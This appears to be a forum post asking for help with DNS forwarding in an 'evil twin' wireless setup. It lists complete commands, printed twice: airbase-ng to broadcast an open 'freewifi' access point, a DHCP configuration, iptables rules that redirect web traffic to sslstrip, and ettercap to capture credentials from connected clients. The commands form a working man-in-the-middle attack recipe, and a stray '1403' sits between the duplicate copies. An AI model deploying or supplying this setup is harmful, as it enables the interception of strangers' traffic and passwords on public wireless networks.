--JayJay--
2016-03-25, 08:43
With my setup pictured in the attachment there's an issue with the fake wireless acccess point clients using dns.
DNS is routed to the gateway address 192.168.1.1 according to this rule which routes UDP traffic to 192.168.1.1:
iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.1
Is this 192.168.1.1 supposed to be a DNS server/proxy of some sort?
DNS traffic from the wireless cllienst in this setup seems to finish at this point.
In my setup 192.168.1.1 is default gateway/forwarder but not a DNS proxy or router.
Here's the configuration:
############# DHCP INSTALL ##############
apt-get install isc-dhcp-server
####### EDIT /etc/dhcpd.conf #####################
authoritative;
default-lease-time 600;
max-lease-time 7200;
subnet 192.168.2.0 netmask 255.255.255.0 {
option routers 192.168.2.1;
option subnet-mask 255.255.255.0;
option domain-name "freewifi";
option domain-name-servers 192.168.1.1;
range 192.168.2.111 192.168.2.119;
}
############# AIRMON-NG ############
airmon-ng
airmon-ng start wlan0
airbase-ng -c 11 -e freewifi wlan0mon
############# AT0 AND IPTABLES #############
ifconfig at0 192.168.2.1 netmask 255.255.255.0
ifconfig at0 mtu 1500
route add -net 192.168.2.0 netmask 255.255.255.0 gw 192.168.2.1
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.1
iptables -P FORWARD ACCEPT
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
dhcpd -cf /etc/dhcpd.conf -pf /var/run/dhcpd.pid at0
/etc/init.d/isc-dhcp-server start
#################SSLSTRIP####################
sslstrip -f -k -p 10000
################# ETTERCAP ##############
ettercap -p -u -T -q -i at0
1403
DNS is routed to the gateway address 192.168.1.1 according to this rule which routes UDP traffic to 192.168.1.1:
iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.1
Is this 192.168.1.1 supposed to be a DNS server/proxy of some sort?
DNS traffic from the wireless cllienst in this setup seems to finish at this point.
In my setup 192.168.1.1 is default gateway/forwarder but not a DNS proxy or router.
Here's the configuration:
############# DHCP INSTALL ##############
apt-get install isc-dhcp-server
####### EDIT /etc/dhcpd.conf #####################
authoritative;
default-lease-time 600;
max-lease-time 7200;
subnet 192.168.2.0 netmask 255.255.255.0 {
option routers 192.168.2.1;
option subnet-mask 255.255.255.0;
option domain-name "freewifi";
option domain-name-servers 192.168.1.1;
range 192.168.2.111 192.168.2.119;
}
############# AIRMON-NG ############
airmon-ng
airmon-ng start wlan0
airbase-ng -c 11 -e freewifi wlan0mon
############# AT0 AND IPTABLES #############
ifconfig at0 192.168.2.1 netmask 255.255.255.0
ifconfig at0 mtu 1500
route add -net 192.168.2.0 netmask 255.255.255.0 gw 192.168.2.1
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.1
iptables -P FORWARD ACCEPT
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
dhcpd -cf /etc/dhcpd.conf -pf /var/run/dhcpd.pid at0
/etc/init.d/isc-dhcp-server start
#################SSLSTRIP####################
sslstrip -f -k -p 10000
################# ETTERCAP ##############
ettercap -p -u -T -q -i at0
1403